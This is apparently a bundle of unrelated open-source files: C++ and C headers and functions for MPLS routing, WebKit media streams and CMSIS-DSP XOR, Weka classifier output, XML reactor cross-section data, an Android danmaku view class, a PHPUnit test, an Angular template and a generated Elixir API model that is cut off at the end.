mpls_route_via_t::ttl_mode_is(mpls_ttl_mode_t ttl_mode) {
ttl_mode_ = ttl_mode;
}
inline mpls_payload_type_t
mpls_route_via_t::payload_type() const {
return payload_type_;
}
inline void
mpls_route_via_t::payload_type_is(mpls_payload_type_t payload_type) {
payload_type_ = payload_type;
}
inline bool
mpls_route_via_t::skip_egress_acl() const {
return skip_egress_acl_;
}
inline void
mpls_route_via_t::skip_egress_acl_is(bool skip_egress_acl) {
skip_egress_acl_ = skip_egress_acl;
}
inline std::string
mpls_route_via_t::nexthop_group() const {
return nexthop_group_;
}
inline void
mpls_route_via_t::nexthop_group_is(std::string nexthop_group) {
nexthop_group_ = nexthop_group;
}
inline bool
mpls_route_via_t::operator==(mpls_route_via_t const & other) const {
return route_key_ == other.route_key_ &&
hop_ == other.hop_ &&
intf_ == other.intf_ &&
pushswap_label_ == other.pushswap_label_ &&
label_action_ == other.label_action_ &&
ttl_mode_ == other.ttl_mode_ &&
payload_type_ == other.payload_type_ &&
skip_egress_acl_ == other.skip_egress_acl_ &&
nexthop_group_ == other.nexthop_group_;
}
inline bool
mpls_route_via_t::operator!=(mpls_route_via_t const & other) const {
return !operator==(other);
}
inline uint32_t
mpls_route_via_t::hash() const {
uint32_t ret = 0;
ret = hash_mix::mix((uint8_t *)&route_key_,
sizeof(mpls_route_key_t), ret);
ret = hash_mix::mix((uint8_t *)&hop_,
sizeof(ip_addr_t), ret);
ret = hash_mix::mix((uint8_t *)&intf_,
sizeof(intf_id_t), ret);
ret = hash_mix::mix((uint8_t *)&pushswap_label_,
sizeof(mpls_label_t), ret);
ret = hash_mix::mix((uint8_t *)&label_action_,
sizeof(mpls_action_t), ret);
ret = hash_mix::mix((uint8_t *)&ttl_mode_,
sizeof(mpls_ttl_mode_t), ret);
ret = hash_mix::mix((uint8_t *)&payload_type_,
sizeof(mpls_payload_type_t), ret);
ret = hash_mix::mix((uint8_t *)&skip_egress_acl_,
sizeof(bool), ret);
ret ^= std::hash<std::string>()(nexthop_group_);
ret = hash_mix::final_mix(ret);
return ret;
}
inline std::string
mpls_route_via_t::to_string() const {
std::ostringstream ss;
ss << "mpls_route_via_t(";
ss << "route_key=" << route_key_;
ss << ", hop=" << hop_;
ss << ", intf=" << intf_;
ss << ", pushswap_label=" << pushswap_label_;
ss << ", label_action=" << label_action_;
ss << ", ttl_mode=" << ttl_mode_;
ss << ", payload_type=" << payload_type_;
ss << ", skip_egress_acl=" << skip_egress_acl_;
ss << ", nexthop_group='" << nexthop_group_ << "'";
ss << ")";
return ss.str();
}
inline std::ostream&
operator<<(std::ostream& os, const mpls_route_via_t& obj) {
os << obj.to_string();
return os;
}
inline mpls_fec_id_t::mpls_fec_id_t() :
id_(0) {
}
inline mpls_fec_id_t::mpls_fec_id_t(uint64_t id) :
id_(id) {
}
inline uint64_t
mpls_fec_id_t::id() const {
return id_;
}
inline void
mpls_fec_id_t::id_is(uint64_t id) {
id_ = id;
}
inline bool
mpls_fec_id_t::operator==(mpls_fec_id_t const & other) const {
return id_ == other.id_;
}
inline bool
mpls_fec_id_t::operator!=(mpls_fec_id_t const & other) const {
return !operator==(other);
}
inline bool
mpls_fec_id_t::operator<(mpls_fec_id_t const & other) const {
if(id_ != other.id_) {
return id_ < other.id_;
}
return false;
}
inline uint32_t
mpls_fec_id_t::hash() const {
uint32_t ret = 0;
ret = hash_mix::mix((uint8_t *)&id_,
sizeof(uint64_t), ret);
ret = hash_mix::final_mix(ret);
return ret;
}
inline std::string
mpls_fec_id_t::to_string() const {
std::ostringstream ss;
ss << "mpls_fec_id_t(";
ss << "id=" << id_;
ss << ")";
return ss.str();
}
inline std::ostream&
operator<<(std::ostream& os, const mpls_fec_id_t& obj) {
os << obj.to_string();
return os;
}
}
#endif // EOS_INLINE_TYPES_MPLS_ROUTE_H
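// Illustrative usage sketch, not part of the SDK header itself. Assuming
// mpls_label_t can be constructed from a raw label value (as the
// std::vector<mpls_label_t>{0} initializer above suggests), a route and its
// key could be built and printed roughly like this:
//
//   eos::mpls_route_key_t key(std::vector<eos::mpls_label_t>{100, 200}, 1);
//   eos::mpls_route_t route(key);
//   std::cout << route.to_string() << std::endl;
//
// The to_string()/operator<< helpers defined above make these types easy to
// log; hash() and operator== support their use as hash-map keys (given a
// suitable std::hash adapter).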
| {
"pile_set_name": "Github"
} |
=== Classifier model (full training set) ===
J48 pruned tree
------------------
A9 = t
| A10 = t: + (228.0/21.0)
| A10 = f
| | A15 <= 444
| | | A7 = v
| | | | A4 = u
| | | | | A14 <= 112
| | | | | | A15 <= 33: + (14.0)
| | | | | | A15 > 33: - (3.0/1.0)
| | | | | A14 > 112
| | | | | | A15 <= 70: - (30.0/10.0)
| | | | | | A15 > 70: + (2.0)
| | | | A4 = y
| | | | | A13 = g: - (12.0/2.0)
| | | | | A13 = p: - (0.0)
| | | | | A13 = s: + (3.0/1.0)
| | | | A4 = l: - (0.0)
| | | | A4 = t: - (0.0)
| | | A7 = h: + (27.0/8.0)
| | | A7 = bb
| | | | A2 <= 27.33: + (3.0)
| | | | A2 > 27.33
| | | | | A3 <= 1.375: + (3.0/1.0)
| | | | | A3 > 1.375: - (8.0)
| | | A7 = j: - (1.0)
| | | A7 = n: + (0.0)
| | | A7 = z: + (0.0)
| | | A7 = dd: + (1.0)
| | | A7 = ff: - (5.0/1.0)
| | | A7 = o: + (0.0)
| | A15 > 444: + (21.0/1.0)
A9 = f
| A3 <= 0.165
| | A7 = v
| | | A2 <= 35.58: - (20.0/4.0)
| | | A2 > 35.58: + (4.0)
| | A7 = h: - (0.0)
| | A7 = bb: + (1.0)
| | A7 = j: + (1.0)
| | A7 = n: + (1.0)
| | A7 = z: - (0.0)
| | A7 = dd: - (0.0)
| | A7 = ff: - (4.0)
| | A7 = o: - (0.0)
| A3 > 0.165: - (298.0/12.0)
Number of Leaves : 32
Size of the tree : 46
Time taken to build model: 0.75 seconds
Time taken to test model on training data: 0.04 seconds
=== Error on training data ===
Correctly Classified Instances 628 91.0145 %
Incorrectly Classified Instances 62 8.9855 %
Kappa statistic 0.8182
Mean absolute error 0.1493
Root mean squared error 0.2732
Relative absolute error 30.2194 %
Root relative squared error 54.9732 %
Total Number of Instances 690
=== Detailed Accuracy By Class ===
TP Rate FP Rate Precision Recall F-Measure MCC ROC Area PRC Area Class
0.902 0.084 0.896 0.902 0.899 0.818 0.943 0.906 +
0.916 0.098 0.921 0.916 0.919 0.818 0.943 0.936 -
Weighted Avg. 0.910 0.091 0.910 0.910 0.910 0.818 0.943 0.923
=== Confusion Matrix ===
a b <-- classified as
277 30 | a = +
32 351 | b = -
Time taken to perform cross-validation: 0.84 seconds
=== Stratified cross-validation ===
Correctly Classified Instances 593 85.942 %
Incorrectly Classified Instances 97 14.058 %
Kappa statistic 0.7151
Mean absolute error 0.1925
Root mean squared error 0.3375
Relative absolute error 38.9675 %
Root relative squared error 67.9034 %
Total Number of Instances 690
=== Detailed Accuracy By Class ===
TP Rate FP Rate Precision Recall F-Measure MCC ROC Area PRC Area Class
0.837 0.123 0.845 0.837 0.841 0.715 0.874 0.788 +
0.877 0.163 0.870 0.877 0.874 0.715 0.874 0.861 -
Weighted Avg. 0.859 0.145 0.859 0.859 0.859 0.715 0.874 0.829
=== Confusion Matrix ===
a b <-- classified as
257 50 | a = +
47 336 | b = -
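Note: the headline figures above follow directly from the confusion matrices. On the training data, (277 + 351) / 690 = 628 / 690 ≈ 91.01 % correctly classified (30 + 32 = 62 errors); under stratified cross-validation, (257 + 336) / 690 = 593 / 690 ≈ 85.94 % (50 + 47 = 97 errors), matching the reported accuracy and error counts.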
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2013 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
* OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef MediaStreamCapabilities_h
#define MediaStreamCapabilities_h
#if ENABLE(MEDIA_STREAM)
#include "MediaStreamCapabilities.h"
#include "MediaStreamSourceCapabilities.h"
#include "ScriptWrappable.h"
#include <wtf/RefCounted.h>
#include <wtf/Vector.h>
#include <wtf/text/WTFString.h>
namespace WebCore {
class CapabilityRange;
class MediaStreamSourceCapabilities;
class MediaStreamCapabilities : public RefCounted<MediaStreamCapabilities>, public ScriptWrappable {
public:
static RefPtr<MediaStreamCapabilities> create(PassRefPtr<MediaStreamSourceCapabilities>);
virtual ~MediaStreamCapabilities() { }
virtual Vector<String> sourceType() const;
virtual Vector<String> sourceId() const;
virtual RefPtr<CapabilityRange> width() const;
virtual RefPtr<CapabilityRange> height() const;
virtual RefPtr<CapabilityRange> frameRate() const;
virtual RefPtr<CapabilityRange> aspectRatio() const;
virtual Vector<String> facingMode() const;
virtual RefPtr<CapabilityRange> volume() const;
bool hasVideoSource() { return m_SourceCapabilities->hasVideoSource(); }
protected:
explicit MediaStreamCapabilities(PassRefPtr<MediaStreamSourceCapabilities>);
RefPtr<MediaStreamSourceCapabilities> m_SourceCapabilities;
};
} // namespace WebCore
#endif // MediaStreamCapabilities_h
#endif
| {
"pile_set_name": "Github"
} |
/* ----------------------------------------------------------------------
* Project: CMSIS DSP Library
* Title: arm_xor_u8.c
* Description: uint8_t bitwise exclusive OR
*
* $Date: 14 November 2019
* $Revision: V1.6.0
*
* Target Processor: Cortex-M cores
* -------------------------------------------------------------------- */
/*
* Copyright (C) 2010-2019 ARM Limited or its affiliates. All rights reserved.
*
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the License); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an AS IS BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "dsp/basic_math_functions.h"
/**
@ingroup groupMath
*/
/**
@addtogroup Xor
@{
*/
/**
@brief Compute the logical bitwise XOR of two fixed-point vectors.
@param[in] pSrcA points to input vector A
@param[in] pSrcB points to input vector B
@param[out] pDst points to output vector
@param[in] blockSize number of samples in each vector
@return none
*/
void arm_xor_u8(
const uint8_t * pSrcA,
const uint8_t * pSrcB,
uint8_t * pDst,
uint32_t blockSize)
{
uint32_t blkCnt; /* Loop counter */
#if defined(ARM_MATH_MVEI) && !defined(ARM_MATH_AUTOVECTORIZE)
q7x16_t vecSrcA, vecSrcB;
/* Compute 16 outputs at a time */
blkCnt = blockSize >> 4;
while (blkCnt > 0U)
{
vecSrcA = vld1q(pSrcA);
vecSrcB = vld1q(pSrcB);
vst1q(pDst, veorq_u8(vecSrcA, vecSrcB) );
pSrcA += 16;
pSrcB += 16;
pDst += 16;
/* Decrement the loop counter */
blkCnt--;
}
/* Tail */
blkCnt = blockSize & 0xF;
if (blkCnt > 0U)
{
mve_pred16_t p0 = vctp8q(blkCnt);
vecSrcA = vld1q(pSrcA);
vecSrcB = vld1q(pSrcB);
vstrbq_p(pDst, veorq_u8(vecSrcA, vecSrcB), p0);
}
#else
#if defined(ARM_MATH_NEON) && !defined(ARM_MATH_AUTOVECTORIZE)
uint8x16_t vecA, vecB;
/* Compute 16 outputs at a time */
blkCnt = blockSize >> 4U;
while (blkCnt > 0U)
{
vecA = vld1q_u8(pSrcA);
vecB = vld1q_u8(pSrcB);
vst1q_u8(pDst, veorq_u8(vecA, vecB) );
pSrcA += 16;
pSrcB += 16;
pDst += 16;
/* Decrement the loop counter */
blkCnt--;
}
/* Tail */
blkCnt = blockSize & 0xF;
#else
/* Initialize blkCnt with number of samples */
blkCnt = blockSize;
#endif
while (blkCnt > 0U)
{
*pDst++ = (*pSrcA++)^(*pSrcB++);
/* Decrement the loop counter */
blkCnt--;
}
#endif /* if defined(ARM_MATH_MVEI) */
}
/**
@} end of Xor group
*/
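/*
  Illustrative usage sketch, not part of CMSIS-DSP itself (the buffer names are
  made up for the example). blockSize is the number of samples in each vector:

      uint8_t srcA[8] = {0xFF, 0x0F, 0xAA, 0x55, 0x00, 0x01, 0x02, 0x03};
      uint8_t srcB[8] = {0x0F, 0xFF, 0x55, 0xAA, 0x00, 0x01, 0x02, 0x03};
      uint8_t dst[8];
      arm_xor_u8(srcA, srcB, dst, 8);
      // dst == {0xF0, 0xF0, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00}

  All three code paths above (Helium/MVE, Neon and the scalar tail loop)
  produce the same element-wise result.
 */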
| {
"pile_set_name": "Github"
} |
<Materials>
<Macros NG=" 2 ">
<material ID=" 1 " NA=" 0 " fissile="true">
<name>Assembly type 1</name>
<TotalXS>0.22222222222222222222222222222222 0.83333333333333333333333333333333</TotalXS>
<NuFissionXS>0.000 0.1350</NuFissionXS>
<ChiXS>1.0 0.0</ChiXS>
<Profile>
1 1
1 2
</Profile>
<ScatteringXS>
0.192102222222222
0.020 0.748301333333333
</ScatteringXS>
<DiffusionCoefficient>1.5 0.4</DiffusionCoefficient>
</material>
<material ID="2" NA="0" fissile="true">
<name>Assembly type 2</name>
<TotalXS>0.22222222222222222222222222222222 0.83333333333333333333333333333333</TotalXS>
<NuFissionXS>0.000 0.1350</NuFissionXS>
<ChiXS>1.0 0.0</ChiXS>
<Profile>
1 1
1 2
</Profile>
<ScatteringXS>
0.192102222222222
0.020 0.753301333333333
</ScatteringXS>
<DiffusionCoefficient>1.5 0.4</DiffusionCoefficient>
</material>
<material ID="3" NA="0" fissile="true">
<name>Assembly type 3</name>
<TotalXS>0.22222222222222222222222222222222 0.83333333333333333333333333333333</TotalXS>
<NuFissionXS>0.000 0.1350</NuFissionXS>
<ChiXS>1.0 0.0</ChiXS>
<Profile>
1 1
1 2
</Profile>
<ScatteringXS>
0.192102222222222
0.020 0.703301333333333
</ScatteringXS>
<DiffusionCoefficient>1.5 0.4</DiffusionCoefficient>
</material>
<material ID="4" NA="0" fissile="false">
<name>Reflector</name>
<TotalXS>0.16666666666666666666666666666667 1.1111111111111111111111111111111</TotalXS>
<Profile>
1 1
1 2
</Profile>
<ScatteringXS>
0.126506666666667
0.040 1.101087111111111
</ScatteringXS>
<DiffusionCoefficient>2.0 0.3</DiffusionCoefficient>
</material>
</Macros>
</Materials>
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2013 Chen Hui <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package master.flame.danmaku.ui.widget;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.Canvas;
import android.graphics.Color;
import android.os.Build;
import android.os.Handler;
import android.os.HandlerThread;
import android.os.Looper;
import android.util.AttributeSet;
import android.view.MotionEvent;
import android.view.View;
import java.util.LinkedList;
import java.util.Locale;
import master.flame.danmaku.controller.DrawHandler;
import master.flame.danmaku.controller.DrawHandler.Callback;
import master.flame.danmaku.controller.DrawHelper;
import master.flame.danmaku.controller.IDanmakuView;
import master.flame.danmaku.controller.IDanmakuViewController;
import master.flame.danmaku.danmaku.model.BaseDanmaku;
import master.flame.danmaku.danmaku.model.IDanmakus;
import master.flame.danmaku.danmaku.model.android.DanmakuContext;
import master.flame.danmaku.danmaku.parser.BaseDanmakuParser;
import master.flame.danmaku.danmaku.renderer.IRenderer.RenderingState;
import master.flame.danmaku.danmaku.util.SystemClock;
public class DanmakuView extends View implements IDanmakuView, IDanmakuViewController {
public static final String TAG = "DanmakuView";
private Callback mCallback;
private HandlerThread mHandlerThread;
protected volatile DrawHandler handler;
private boolean isSurfaceCreated;
private boolean mEnableDanmakuDrwaingCache = true;
private OnDanmakuClickListener mOnDanmakuClickListener;
private float mXOff;
private float mYOff;
private OnClickListener mOnClickListener;
private DanmakuTouchHelper mTouchHelper;
private boolean mShowFps;
private boolean mDanmakuVisible = true;
protected int mDrawingThreadType = THREAD_TYPE_NORMAL_PRIORITY;
private Object mDrawMonitor = new Object();
private boolean mDrawFinished = false;
protected boolean mRequestRender = false;
private long mUiThreadId;
public DanmakuView(Context context) {
super(context);
init();
}
private void init() {
mUiThreadId = Thread.currentThread().getId();
setBackgroundColor(Color.TRANSPARENT);
setDrawingCacheBackgroundColor(Color.TRANSPARENT);
DrawHelper.useDrawColorToClearCanvas(true, false);
mTouchHelper = DanmakuTouchHelper.instance(this);
}
public DanmakuView(Context context, AttributeSet attrs) {
super(context, attrs);
init();
}
public DanmakuView(Context context, AttributeSet attrs, int defStyle) {
super(context, attrs, defStyle);
init();
}
public void addDanmaku(BaseDanmaku item) {
if (handler != null) {
handler.addDanmaku(item);
}
}
@Override
public void invalidateDanmaku(BaseDanmaku item, boolean remeasure) {
if (handler != null) {
handler.invalidateDanmaku(item, remeasure);
}
}
@Override
public void removeAllDanmakus(boolean isClearDanmakusOnScreen) {
if (handler != null) {
handler.removeAllDanmakus(isClearDanmakusOnScreen);
}
}
@Override
public void removeAllLiveDanmakus() {
if (handler != null) {
handler.removeAllLiveDanmakus();
}
}
@Override
public IDanmakus getCurrentVisibleDanmakus() {
if (handler != null) {
return handler.getCurrentVisibleDanmakus();
}
return null;
}
public void setCallback(Callback callback) {
mCallback = callback;
if (handler != null) {
handler.setCallback(callback);
}
}
@Override
public void release() {
stop();
if(mDrawTimes!= null) mDrawTimes.clear();
}
@Override
public void stop() {
stopDraw();
}
private synchronized void stopDraw() {
if (this.handler == null) {
return;
}
DrawHandler handler = this.handler;
this.handler = null;
unlockCanvasAndPost();
if (handler != null) {
handler.quit();
}
HandlerThread handlerThread = this.mHandlerThread;
mHandlerThread = null;
if (handlerThread != null) {
try {
handlerThread.join();
} catch (InterruptedException e) {
e.printStackTrace();
}
handlerThread.quit();
}
}
protected synchronized Looper getLooper(int type) {
if (mHandlerThread != null) {
mHandlerThread.quit();
mHandlerThread = null;
}
int priority;
switch (type) {
case THREAD_TYPE_MAIN_THREAD:
return Looper.getMainLooper();
case THREAD_TYPE_HIGH_PRIORITY:
priority = android.os.Process.THREAD_PRIORITY_URGENT_DISPLAY;
break;
case THREAD_TYPE_LOW_PRIORITY:
priority = android.os.Process.THREAD_PRIORITY_LOWEST;
break;
case THREAD_TYPE_NORMAL_PRIORITY:
default:
priority = android.os.Process.THREAD_PRIORITY_DEFAULT;
break;
}
String threadName = "DFM Handler Thread #" + priority;
mHandlerThread = new HandlerThread(threadName, priority);
mHandlerThread.start();
return mHandlerThread.getLooper();
}
private void prepare() {
if (handler == null)
handler = new DrawHandler(getLooper(mDrawingThreadType), this, mDanmakuVisible);
}
@Override
public void prepare(BaseDanmakuParser parser, DanmakuContext config) {
prepare();
handler.setConfig(config);
handler.setParser(parser);
handler.setCallback(mCallback);
handler.prepare();
}
@Override
public boolean isPrepared() {
return handler != null && handler.isPrepared();
}
@Override
public DanmakuContext getConfig() {
if (handler == null) {
return null;
}
return handler.getConfig();
}
@Override
public void showFPS(boolean show){
mShowFps = show;
}
private static final int MAX_RECORD_SIZE = 50;
private static final int ONE_SECOND = 1000;
private LinkedList<Long> mDrawTimes;
protected boolean mClearFlag;
private float fps() {
long lastTime = SystemClock.uptimeMillis();
mDrawTimes.addLast(lastTime);
Long first = mDrawTimes.peekFirst();
if (first == null) {
return 0.0f;
}
float dtime = lastTime - first;
int frames = mDrawTimes.size();
if (frames > MAX_RECORD_SIZE) {
mDrawTimes.removeFirst();
}
return dtime > 0 ? mDrawTimes.size() * ONE_SECOND / dtime : 0.0f;
}
@Override
public long drawDanmakus() {
if (!isSurfaceCreated)
return 0;
if (!isShown())
return -1;
long stime = SystemClock.uptimeMillis();
lockCanvas();
return SystemClock.uptimeMillis() - stime;
}
@SuppressLint("NewApi")
private void postInvalidateCompat() {
mRequestRender = true;
if(Build.VERSION.SDK_INT >= 16) {
this.postInvalidateOnAnimation();
} else {
this.postInvalidate();
}
}
protected void lockCanvas() {
if(mDanmakuVisible == false) {
return;
}
postInvalidateCompat();
synchronized (mDrawMonitor) {
while ((!mDrawFinished) && (handler != null)) {
try {
mDrawMonitor.wait(200);
} catch (InterruptedException e) {
if (mDanmakuVisible == false || handler == null || handler.isStop()) {
break;
} else {
Thread.currentThread().interrupt();
}
}
}
mDrawFinished = false;
}
}
private void lockCanvasAndClear() {
mClearFlag = true;
lockCanvas();
}
private void unlockCanvasAndPost() {
synchronized (mDrawMonitor) {
mDrawFinished = true;
mDrawMonitor.notifyAll();
}
}
@Override
protected void onDraw(Canvas canvas) {
if ((!mDanmakuVisible) && (!mRequestRender)) {
super.onDraw(canvas);
return;
}
if (mClearFlag) {
DrawHelper.clearCanvas(canvas);
mClearFlag = false;
} else {
if (handler != null) {
RenderingState rs = handler.draw(canvas);
if (mShowFps) {
if (mDrawTimes == null)
mDrawTimes = new LinkedList<Long>();
String fps = String.format(Locale.getDefault(),
"fps %.2f,time:%d s,cache:%d,miss:%d", fps(), getCurrentTime() / 1000,
rs.cacheHitCount, rs.cacheMissCount);
DrawHelper.drawFPS(canvas, fps);
}
}
}
mRequestRender = false;
unlockCanvasAndPost();
}
@Override
protected void onLayout(boolean changed, int left, int top, int right, int bottom) {
super.onLayout(changed, left, top, right, bottom);
if (handler != null) {
handler.notifyDispSizeChanged(right - left, bottom - top);
}
isSurfaceCreated = true;
}
public void toggle() {
if (isSurfaceCreated) {
if (handler == null)
start();
else if (handler.isStop()) {
resume();
} else
pause();
}
}
@Override
public void pause() {
if (handler != null) {
handler.removeCallbacks(mResumeRunnable);
handler.pause();
}
}
private int mResumeTryCount = 0;
private Runnable mResumeRunnable = new Runnable() {
@Override
public void run() {
DrawHandler drawHandler = handler;
if (drawHandler == null) {
return;
}
mResumeTryCount++;
if (mResumeTryCount > 4 || DanmakuView.super.isShown()) {
drawHandler.resume();
} else {
drawHandler.postDelayed(this, 100 * mResumeTryCount);
}
}
};
@Override
public void resume() {
if (handler != null && handler.isPrepared()) {
mResumeTryCount = 0;
handler.post(mResumeRunnable);
} else if (handler == null) {
restart();
}
}
@Override
public boolean isPaused() {
if(handler != null) {
return handler.isStop();
}
return false;
}
public void restart() {
stop();
start();
}
@Override
public void start() {
start(0);
}
@Override
public void start(long position) {
Handler handler = this.handler;
if (handler == null) {
prepare();
handler = this.handler;
} else {
handler.removeCallbacksAndMessages(null);
}
if (handler != null) {
handler.obtainMessage(DrawHandler.START, position).sendToTarget();
}
}
@Override
public boolean onTouchEvent(MotionEvent event) {
boolean isEventConsumed = mTouchHelper.onTouchEvent(event);
if (!isEventConsumed) {
return super.onTouchEvent(event);
}
return isEventConsumed;
}
public void seekTo(Long ms) {
if(handler != null){
handler.seekTo(ms);
}
}
public void enableDanmakuDrawingCache(boolean enable) {
mEnableDanmakuDrwaingCache = enable;
}
@Override
public boolean isDanmakuDrawingCacheEnabled() {
return mEnableDanmakuDrwaingCache;
}
@Override
public boolean isViewReady() {
return isSurfaceCreated;
}
@Override
public int getViewWidth() {
return super.getWidth();
}
@Override
public int getViewHeight() {
return super.getHeight();
}
@Override
public View getView() {
return this;
}
@Override
public void show() {
showAndResumeDrawTask(null);
}
@Override
public void showAndResumeDrawTask(Long position) {
mDanmakuVisible = true;
mClearFlag = false;
if (handler == null) {
return;
}
handler.showDanmakus(position);
}
@Override
public void hide() {
mDanmakuVisible = false;
if (handler == null) {
return;
}
handler.hideDanmakus(false);
}
@Override
public long hideAndPauseDrawTask() {
mDanmakuVisible = false;
if (handler == null) {
return 0;
}
return handler.hideDanmakus(true);
}
@Override
public void clear() {
if (!isViewReady()) {
return;
}
if (!mDanmakuVisible || Thread.currentThread().getId() == mUiThreadId) {
mClearFlag = true;
postInvalidateCompat();
} else {
lockCanvasAndClear();
}
}
@Override
public boolean isShown() {
return mDanmakuVisible && super.isShown();
}
@Override
public void setDrawingThreadType(int type) {
mDrawingThreadType = type;
}
@Override
public long getCurrentTime() {
if (handler != null) {
return handler.getCurrentTime();
}
return 0;
}
@Override
@SuppressLint("NewApi")
public boolean isHardwareAccelerated() {
// >= 3.0
if (Build.VERSION.SDK_INT >= 11) {
return super.isHardwareAccelerated();
} else {
return false;
}
}
@Override
public void clearDanmakusOnScreen() {
if (handler != null) {
handler.clearDanmakusOnScreen();
}
}
@Override
public void setOnDanmakuClickListener(OnDanmakuClickListener listener) {
mOnDanmakuClickListener = listener;
}
@Override
public void setOnDanmakuClickListener(OnDanmakuClickListener listener, float xOff, float yOff) {
mOnDanmakuClickListener = listener;
mXOff = xOff;
mYOff = yOff;
}
@Override
public OnDanmakuClickListener getOnDanmakuClickListener() {
return mOnDanmakuClickListener;
}
@Override
public float getXOff() {
return mXOff;
}
@Override
public float getYOff() {
return mYOff;
}
public void forceRender() {
mRequestRender = true;
handler.forceRender();
}
}
| {
"pile_set_name": "Github"
} |
--TEST--
phpunit -c ../_files/configuration.custom-printer.xml --verbose IncompleteTest ../_files/IncompleteTest.php
--FILE--
<?php
$_SERVER['argv'][1] = '-c';
$_SERVER['argv'][2] = dirname(__FILE__) . '/../_files/configuration.custom-printer.xml';
$_SERVER['argv'][3] = '--verbose';
$_SERVER['argv'][4] = 'IncompleteTest';
$_SERVER['argv'][5] = dirname(__FILE__) . '/../_files/IncompleteTest.php';
require __DIR__ . '/../bootstrap.php';
PHPUnit_TextUI_Command::main();
?>
--EXPECTF--
PHPUnit %s by Sebastian Bergmann and contributors.
Runtime: %s
Configuration: %sconfiguration.custom-printer.xml
I
Time: %s, Memory: %s
There was 1 incomplete test:
1) IncompleteTest::testIncomplete
Test incomplete
%s
OK, but incomplete, skipped, or risky tests!
Tests: 1, Assertions: 0, Incomplete: 1.
| {
"pile_set_name": "Github"
} |
<mat-toolbar color="primary">
<button mat-button class="sidenav-toggle" (click)="toggleSidenav.emit()">
<mat-icon aria-label="Drawer Menu" svgIcon="baseline-menu"></mat-icon>
</button>
<span>A .NET Core Blog</span>
<span class="toolbar-spacer"></span>
<button mat-button [matMenuTriggerFor]="menu">
<mat-icon svgIcon="baseline-more_vert"></mat-icon>
</button>
<mat-menu #menu="matMenu">
<button mat-menu-item>Sign In</button>
<button mat-menu-item>Sign out</button>
</mat-menu>
</mat-toolbar>
| {
"pile_set_name": "Github"
} |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# NOTE: This file is auto generated by the elixir code generator program.
# Do not edit this file manually.
defmodule GoogleApi.Admin.Datatransfer_v1.Model.DataTransfersListResponse do
@moduledoc """
Template for a collection of DataTransfer resources. STEPLADDER: Generated unstable field number for field 'kind'. (See http://go/stepladder-help#fieldNumber) STEPLADDER: Generated unstable field number for field 'etag'. (See http://go/stepladder-help#fieldNumber)
## Attributes
* `dataTransfers` (*type:* `list(GoogleApi.Admin.Datatransfer_v1.Model.DataTransfer.t)`, *default:* `nil`) - List of data transfer requests.
* `etag` (*type:* `String.t`, *default:* `nil`) - ETag of the resource.
* `kind` (*type:* `String.t`, *default:* `admin#datatransfer#dataTransfersList`) - Identifies the resource as a collection of data transfer requests.
* `nextPageToken` (*type:* `String.t`, *default:* `nil`) - Continuation token which will be used to specify next page in list API.
"""
use GoogleApi.Gax.ModelBase
@type t :: %__MODULE__{
:dataTransfers => list(GoogleApi.Admin.Datatransfer_v1.Model.DataTransfer.t()),
:etag => String.t(),
:kind => String.t(),
:nextPageToken => String.t()
}
field(:dataTransfers, as: GoogleApi.Admin.Datatransfer_v1.Model.DataTransfer, type: :list)
field(:etag)
field(:kind)
field(:nextPageToken)
end
defimpl Poison.Decoder, for: GoogleApi.Admin.Datatransfer_v1.Model.DataTransfersListResponse do
def decode(value, options) do
GoogleApi.Admin.Datatransfer_v1.Model.DataTransfersListResponse.decode(value, options)
end
end
defimpl Poison.Encoder, for: GoogleApi.Admin.Datatransfer_v1.Model.DataTransfersListResponse do
def encode(value, options) do
GoogleApi.Gax.ModelBase.encode(value, options)
end
end
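# Illustrative sketch, not part of the generated module: because this model is a
# plain struct, a decoded list response can be pattern-matched directly, e.g.
#
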